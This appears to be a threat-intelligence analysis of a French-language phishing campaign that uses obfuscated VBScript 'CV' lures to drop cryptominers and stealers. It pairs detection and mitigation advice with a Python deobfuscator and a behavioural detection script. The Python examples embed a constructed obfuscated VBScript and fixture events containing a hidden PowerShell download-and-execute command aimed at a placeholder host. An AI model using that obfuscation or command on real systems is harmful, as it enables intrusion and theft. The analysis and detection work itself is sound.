Full Report
An ongoing phishing campaign is targeting French-speaking corporate environments with fake resumes that lead to the deployment of cryptocurrency miners and information stealers. "The campaign uses highly obfuscated VBScript files disguised as resume/CV documents, delivered through phishing emails," Securonix researchers Shikha Sangwan, Akshay Gaikwad, and Aaron Beardslee said in a report shared
Analysis Summary
# Tool/Technique: STEEP#MAVERICK (VBScript Phishing Campaign)
## Overview
STEEP#MAVERICK is an ongoing phishing campaign targeting French-speaking corporate entities. It uses a multi-stage infection chain that begins with a heavily obfuscated VBScript file masquerading as a resume (CV) and ends with the deployment of the XMRig cryptocurrency miner and information stealers, so that the operators earn mining revenue and harvest credentials from the same foothold.
## Technical Details
- **Type:** Malware Campaign (Involving Info-stealers and Cryptominers)
- **Platform:** Windows
- **Capabilities:** Obfuscation, Anti-Analysis, Persistence, Cryptocurrency Mining, Credential and Data Theft with Exfiltration.
- **First Seen:** Late 2023 / Early 2024
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
- T1566.001 - Phishing: Spearphishing Attachment
- **TA0002 - Execution**
- T1059.005 - Command and Scripting Interpreter: Visual Basic (VBScript)
- T1204.002 - User Execution: Malicious File
- **TA0003 - Persistence**
- T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
- **TA0005 - Defense Evasion**
- T1027 - Obfuscated Files or Information
- T1497 - Virtualization/Sandbox Evasion
- **TA0011 - Command and Control**
- T1105 - Ingress Tool Transfer (download of the XMRig and stealer payloads)
- **TA0040 - Impact**
- T1496 - Resource Hijacking (Cryptomining)
## Functionality
### Core Capabilities
- **Deceptive Delivery:** Uses French-language resume filenames (e.g. `CV_Jean_Marc.vbs`, an illustrative name) aimed at HR staff. Because Windows hides known file extensions by default, a name such as `CV_Jean_Marc.pdf.vbs` is displayed as `CV_Jean_Marc.pdf`, which is what makes a script file pass as a document.
- **Heavy Obfuscation:** The initial VBScript never stores its real strings in the clear. It assembles them at runtime from `Chr()`/`ChrW()` character codes, reversed fragments and long `&` concatenation chains, so keyword-based static scanners have nothing to match until the script is decoded.
- **Staged Payload Delivery:** Once decoded, the script downloads the second-stage payloads (XMRig and information stealers) from attacker-controlled command-and-control (C2) or staging servers and launches them.
### Advanced Features
- **Anti-Analysis Checks:** Before detonating, the script looks for signs of a virtual machine, a debugger or a sandbox (for example sandbox-specific file paths) and exits if any are present, so automated analysis sees a harmless script.
- **Automated Persistence:** Writes a Windows Registry Run key so the miner is relaunched at every logon or reboot.
- **Throttling:** Configures XMRig with a CPU usage cap so the victim does not notice the performance degradation that would otherwise expose the miner.
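To make the obfuscation and staging behaviour concrete, the following is an added example written for this page, not code from the page itself or from Securonix. It statically folds the string-building subset of VBScript that such lures rely on (`Chr`/`ChrW` character codes, `&H` hex literals, `&` concatenation and `StrReverse`) and then reports which download-and-execute keywords appear only after decoding. The `SAMPLE_VBS` script is constructed for the example in the style described above; the `192.0.2.10` address is a TEST-NET placeholder, and every function and variable name is the example's own.

```python
import re

# Constructed sample in the style of the lure described above, not a real campaign
# file: each telling keyword is built from Chr()/ChrW() codes, &H hex literals and
# StrReverse() so a grep for "powershell" or "http" over the raw file finds nothing.
SAMPLE_VBS = r'''
a = ChrW(112) & ChrW(111) & ChrW(119) & ChrW(101) & ChrW(114) & ChrW(&H73) & ChrW(&H68) & ChrW(101) & ChrW(108) & ChrW(108)
b = StrReverse(")'vc/01.2.0.291//:ptth'(gnirtSdaolnwoD.)tneilCbeW.teN tcejbO-weN(")
c = a & " -w hidden -c " & ChrW(34) & "IEX " & b & ChrW(34)
Set sh = CreateObject(Chr(87) & Chr(83) & Chr(99) & "ript." & "Shell")
sh.Run c, 0, False
'''

TOKEN_RE = re.compile(r'\s*(?:(?P<str>"(?:[^"]|"")*")|(?P<hex>&H[0-9A-Fa-f]+)|(?P<num>\d+)|(?P<id>[A-Za-z_]\w*)|(?P<op>[()&,]))')
ASSIGN_RE = re.compile(r"^(?:Set\s+)?([A-Za-z_]\w*)\s*=\s*(.+)$", re.I)
METHOD_RE = re.compile(r"^([A-Za-z_]\w*\.[A-Za-z_]\w*)\s+(.+)$")
IOC_RE = re.compile(r"powershell|DownloadString|DownloadFile|Invoke-WebRequest|WebClient|https?://", re.I)

def tokenize(expr):
    toks, pos, expr = [], 0, expr.strip()
    while pos < len(expr):
        m = TOKEN_RE.match(expr, pos)
        if not m:
            raise ValueError(f"unsupported syntax near {expr[pos:pos + 20]!r}")
        pos = m.end()
        toks.append((m.lastgroup, m.group(m.lastgroup)))
    return toks

class Evaluator:
    """Folds the string-building subset of VBScript: literals, Chr/ChrW, StrReverse and '&'."""
    def __init__(self):
        self.env, self.chr_calls = {}, 0   # variables seen so far; Chr/ChrW calls folded

    def eval_list(self, expr):             # evaluates 'c, 0, False' -> [value_of_c, 0, '<False>']
        self.toks, self.i = tokenize(expr), 0
        values = self._args()
        if self.i != len(self.toks):
            raise ValueError(f"unparsed tokens in {expr!r}")
        return values

    def _accept(self, op):                 # consume the operator token if it is next
        hit = self.i < len(self.toks) and self.toks[self.i] == ("op", op)
        self.i += hit
        return hit

    def _args(self):
        values = [self._concat()]
        while self._accept(","):
            values.append(self._concat())
        return values

    def _concat(self):                     # term ('&' term)*
        val = self._term()
        while self._accept("&"):
            val = str(val) + str(self._term())
        return val

    def _term(self):
        kind, text = self.toks[self.i]
        self.i += 1
        if kind == "str":
            return text[1:-1].replace('""', '"')
        if kind in ("hex", "num"):
            return int(text[2:], 16) if kind == "hex" else int(text)
        if kind == "id" and not self._accept("("):      # variable reference
            return self.env.get(text.lower(), f"<{text}>")
        if kind == "id" or text == "(":                  # call, or parenthesised expression
            args = self._args()
            if not self._accept(")"):
                raise ValueError("missing ')'")
            return self._call(text, args) if kind == "id" else args[0]
        raise ValueError(f"unexpected token {text!r}")

    def _call(self, name, args):           # Chr/ChrW/StrReverse folded; others (CreateObject...) kept symbolically
        fn = name.lower()
        if fn in ("chr", "chrw"):
            self.chr_calls += 1
            return chr(int(args[0]))
        return str(args[0])[::-1] if fn == "strreverse" else f"{name}({', '.join(map(str, args))})"

def deobfuscate(script):
    """Walk the script line by line, folding assignments and method-call arguments."""
    ev, statements = Evaluator(), []
    for line in (l.strip() for l in script.splitlines()):
        if not line or line.startswith("'") or line.lower().startswith(("rem ", "dim ")):
            continue
        if m := ASSIGN_RE.match(line):         # x = <expr>  /  Set x = <expr>
            ev.env[m.group(1).lower()] = ev.eval_list(m.group(2))[0]
            statements.append(f"{m.group(1)} = {ev.env[m.group(1).lower()]}")
        elif m := METHOD_RE.match(line):       # obj.Method arg1, arg2, ...
            statements.append(f"{m.group(1)}({', '.join(map(str, ev.eval_list(m.group(2))))})")
        else:
            statements.append(line)            # control flow etc. passes through untouched
    return ev, statements

def analyse(script):
    """IOC hits before and after folding, plus how much Chr/ChrW obfuscation was unwound."""
    ev, statements = deobfuscate(script)
    hits = lambda text: sorted({m.group(0).lower() for m in IOC_RE.finditer(text)})
    return {"chr_calls": ev.chr_calls, "hits_raw": hits(script),
            "hits_decoded": hits("\n".join(statements)), "statements": statements}
```

Calling `analyse(SAMPLE_VBS)` gives an empty `hits_raw` list but `powershell`, `WebClient`, `DownloadString` and `http://` in `hits_decoded`, with fifteen folded `Chr`/`ChrW` calls: the density of those calls, not the entropy of the text, is what distinguishes the lure from an ordinary administrative script. Real samples add further layers (character codes held in arrays, `Execute` of assembled code, junk functions), so this folder is the starting point for the deobfuscation a sandbox report would otherwise have to supply.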
## Indicators of Compromise
*(Note: The indicators below are illustrative patterns rather than a verified IOC list; hashes and C2 addresses change between iterations and should be taken from the Securonix report for the iteration being investigated.)*
- **File Names:** `CV_[Name].vbs`, `Curriculum_Vitae.vbs`, `Resume.vbs`
- **Network Indicators:**
- `hxxp[:]//185[.]196[.]9[.]154/` (example C2 address)
- `hxxps[:]//github[.]com/xmrig/xmrig/releases/download/...` (the miner binary fetched directly from the official XMRig release page, so the download itself is not malicious traffic on its own)
- **Process Behaviors:**
- `wscript.exe` executing scripts from the `Downloads` or `AppData` folder.
- Sustained high CPU usage from a process named `taskhost.exe` that runs from a user-writable path (the genuine binary lives in `C:\Windows\System32`), or from a renamed `xmrig.exe`.
## Associated Threat Actors
- **Status:** Currently unattributed (Unknown threat actor, likely financially motivated).
## Detection Methods
- **Signature-based detection:** Scan `.vbs` attachments for obfuscation structure rather than keywords: a high density of `Chr()`/`ChrW()` calls, `StrReverse` applied to long literals, and very long `&` concatenation chains. The entropy of the raw text is a weak signal on its own (source code rarely looks random) and should only be used alongside these structural indicators.
- **Behavioral detection:**
- `wscript.exe` or `cscript.exe` initiating outbound network connections or spawning `powershell.exe`; baseline legitimate logon scripts first so they can be excluded.
- Unauthorized modifications to `HKCU\Software\Microsoft\Windows\CurrentVersion\Run` (and to `HKLM\...\Run`, `RunOnce` or the Startup folder) made by a script host or PowerShell process, or pointing at a binary in a user-writable directory.
- **YARA Rules:** Match the combination of resume-themed strings or filenames with PowerShell download primitives (`DownloadString`, `DownloadFile`, `Invoke-WebRequest`, `Net.WebClient`). Because these strings are obfuscated on disk, run the rule against the deobfuscated script or the resulting PowerShell command line rather than against the raw file.
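The behavioural rules above, applied to a handful of constructed Sysmon-style events, as an added example that is not part of the page and not a vendor's detection content. The event dictionaries reuse the field names of Sysmon Event IDs 1 (process creation), 3 (network connection) and 13 (registry value set); the hostnames, PIDs, the TEST-NET address `192.0.2.10` and the XMRig-style command line are all made up for the example, and the rule names are the example's own.

```python
import re

# Constructed Sysmon-style events, not real telemetry: WS-HR-01 runs a legitimate logon
# script and a vendor installer; WS-HR-02 opens a CV lure that behaves as the page
# describes. Hostnames, PIDs, the TEST-NET address 192.0.2.10 and the miner command
# line are all made up for this example.
SAMPLE_EVENTS = [
    {"EventID": 1, "Computer": "WS-HR-01", "ProcessId": 3120,
     "Image": r"C:\Windows\System32\wscript.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" \\dc01\netlogon\printers.vbs'},
    {"EventID": 13, "Computer": "WS-HR-01", "ProcessId": 900,
     "Image": r"C:\Program Files\Vendor\setup.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorTray",
     "Details": r"C:\Program Files\Vendor\tray.exe"},
    {"EventID": 1, "Computer": "WS-HR-02", "ProcessId": 4412,
     "Image": r"C:\Windows\System32\wscript.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" "C:\Users\hr\Downloads\CV_Jean_Marc.vbs"'},
    {"EventID": 3, "Computer": "WS-HR-02", "ProcessId": 4412,
     "Image": r"C:\Windows\System32\wscript.exe", "DestinationIp": "192.0.2.10", "DestinationPort": 80},
    {"EventID": 1, "Computer": "WS-HR-02", "ProcessId": 4500,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": "powershell -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/cv')"},
    {"EventID": 13, "Computer": "WS-HR-02", "ProcessId": 4500,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\OneDriveUpdate",
     "Details": r"C:\Users\hr\AppData\Roaming\taskhost.exe --cpu-max-threads-hint=25"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\\", re.I)
USER_WRITABLE_RE = re.compile(r"\\(?:Downloads|AppData|Temp|Public|ProgramData)\\", re.I)
SCRIPT_EXT_RE = re.compile(r"\.(?:vbs|vbe|js|jse|wsf)\b", re.I)
SYSTEM_NAMES = {"taskhost.exe", "taskhostw.exe", "svchost.exe"}   # names the miner borrows

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def masquerading(path):
    """A system-binary name running from anywhere but System32 is the page's renamed-miner case."""
    return basename(path) in SYSTEM_NAMES and not path.lower().startswith("c:\\windows\\system32\\")

def evaluate(event):
    """Apply the behavioural rules to one event; returns a list of (rule, detail) hits."""
    eid, image = event["EventID"], basename(event.get("Image", ""))
    parent, cmd = basename(event.get("ParentImage", "")), event.get("CommandLine", "")
    hits = []
    if eid == 1 and image in SCRIPT_HOSTS and SCRIPT_EXT_RE.search(cmd) and USER_WRITABLE_RE.search(cmd):
        hits.append(("script_host_from_user_dir", cmd))       # wscript.exe running a .vbs out of Downloads/AppData
    if eid == 1 and parent in SCRIPT_HOSTS and image == "powershell.exe":
        hits.append(("vbs_to_powershell", cmd))               # the VBS-to-PowerShell wrapper stage
    if eid == 3 and image in SCRIPT_HOSTS:
        hits.append(("script_host_network", f"{event.get('DestinationIp')}:{event.get('DestinationPort')}"))
    if eid == 13 and RUN_KEY_RE.search(event.get("TargetObject", "")):
        details = event.get("Details", "")
        if image in SCRIPT_HOSTS | {"powershell.exe"} or USER_WRITABLE_RE.search(details) \
                or masquerading(details.split(" ", 1)[0]):
            hits.append(("run_key_persistence", event["TargetObject"]))
    return hits

def triage(events):
    """Run every event through the rules; one alert record per hit, in event order."""
    return [{"host": e["Computer"], "pid": e.get("ProcessId"), "rule": rule, "detail": detail}
            for e in events for rule, detail in evaluate(e)]

def chains(alerts):
    """Group rule hits per host so one lure surfaces as a single multi-stage chain rather than four alerts."""
    by_host = {}
    for a in alerts:
        by_host.setdefault(a["host"], []).append(a["rule"])
    return by_host

if __name__ == "__main__":
    for a in triage(SAMPLE_EVENTS):
        print(a)
    print(chains(triage(SAMPLE_EVENTS)))
```

The two WS-HR-01 events produce no hits: the logon script runs from a NETLOGON share rather than a user-writable directory, and the installer's Run value points into `Program Files` and is written by a non-script process. The four WS-HR-02 hits arrive in the order the page describes (script host from `Downloads`, script host on the network, hidden PowerShell child, Run key pointing at a `taskhost.exe` under `AppData`), which is why grouping by host, and in production by process tree, matters more than any single rule.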
## Mitigation Strategies
- **Email Security:** Block or sandbox script attachments (`.vbs`, `.vbe`, `.js`, `.jse`, `.wsf`) at the gateway, including when they arrive inside archives.
- **Host Hardening:** Disable Windows Script Host (WSH) where it is not needed by setting the `Enabled` DWORD value to `0` under `HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings` (system-wide) or under the same path in `HKCU` (per user). Where WSH must stay enabled, re-associate `.vbs` and `.js` files with Notepad so a double-click opens the script for viewing instead of running it.
- **User Training:** Educate HR departments on the risks of executing script files (`.vbs`, `.js`) disguised as document files, and show them how to display file extensions in Explorer.
- **Application Whitelisting:** Use AppLocker (which has a dedicated Script Rules collection covering `.vbs`, `.js`, `.ps1`, `.cmd` and `.bat`) or Windows Defender Application Control (WDAC) to block unapproved scripts and binaries, in particular anything executing from user-writable locations such as `Downloads` and `AppData`.
## Related Tools/Techniques
- **XMRig:** Open-source Monero miner that is legitimate software in itself but is routinely bundled by threat actors; its presence under a user-writable path or under a borrowed system-binary name is the signal, not the binary alone.
- **VBS-to-PowerShell Wrappers:** A common technique in which the script-host stage exists only to launch a hidden `powershell.exe` with a download-and-execute command, giving the attacker full shell capabilities from an initial `.vbs` foothold.